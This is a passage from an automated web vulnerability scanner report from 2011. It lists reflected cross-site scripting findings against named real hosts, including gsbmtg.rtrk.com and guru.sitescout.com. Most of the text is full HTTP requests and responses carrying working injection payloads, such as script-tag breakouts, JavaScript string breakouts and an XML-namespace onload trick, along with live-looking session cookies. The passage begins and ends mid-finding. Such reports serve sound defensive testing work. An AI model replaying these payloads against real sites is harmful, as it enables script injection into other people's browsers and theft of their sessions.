Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:35 GMT;path=/;httponly
Content-Length: 6459


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.154. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee1d"><script>alert(1)</script>f134721e21d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:33 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:25 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/54
...[SNIP]...

1.155. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb3a"><script>alert(1)</script>297f12ffdf6 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:31 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:22 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa0
...[SNIP]...

1.156. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de62"><script>alert(1)</script>2b2bf4c448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:14:22 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:43:14 GMT;path=/;httponly
Content-Length: 2873

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
rl" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gs
...[SNIP]...

1.157. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [primary_serv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27040"><script>alert(1)</script>aafc10e2bc0 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:45 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_
...[SNIP]...

1.158. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [rl_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8861"><script>alert(1)</script>1103dfbaf was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:13 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:05 GMT;path=/;httponly
Content-Length: 2863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319
...[SNIP]...

1.159. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [rl_track_landing_pages parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd298"><script>alert(1)</script>b6146d9bf2b was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:13:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:42:03 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbm
...[SNIP]...

1.160. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [scid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c936"><script>alert(1)</script>e5cf5050a89 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:02 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/cou
...[SNIP]...

1.161. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [tc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41069"><script>alert(1)</script>db536dcf13f was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:47 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid
...[SNIP]...

1.162. http://gsbmtg1-px.rtrk.com/forms.php [load parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg1-px.rtrk.com
Path:   /forms.php

Issue detail

The value of the load request parameter is copied into the XML document as plain text between tags. The payload 5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0 was submitted in the load parameter. This input was echoed as 5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

POST /forms.php HTTP/1.1
Host: gsbmtg1-px.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Origin: http://gsbmtg1-px.rtrk.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; __utmz=41275828.1296748869.1.1.utmcsr=gsbmtg.rtrk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=41275828.848354389.1296748869.1296748869.1296748869.1; __utmc=41275828; __utmb=41275828.1.10.1296748869; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Content-Length: 28

page=quickQuoteData&load=yes5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.6
X-RL-Host: pweb107
X-Robots-Tag: noindex,nofollow
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: SID=e52c977d4154461315941161ee33cb46;path=/
Content-Length: 226
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:31:50 GMT;path=/;httponly

<?xml version="1.0" ?><status><pageto>yes5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0</pageto><redirect>&amp;nbsp;</redirect><homeSearchSource>%26nbsp%3B</
...[SNIP]...

1.163. http://guru.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ac4'%3balert(1)//23282effb6e was submitted in the h parameter. This input was echoed as 74ac4';alert(1)//23282effb6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A652&w=300&h=25074ac4'%3balert(1)//23282effb6e&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:29 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25074ac4';alert(1)//23282effb6e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.164. http://guru.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8759f"%3balert(1)//240ee4185ab was submitted in the pid parameter. This input was echoed as 8759f";alert(1)//240ee4185ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A6528759f"%3balert(1)//240ee4185ab&w=300&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:28 GMT
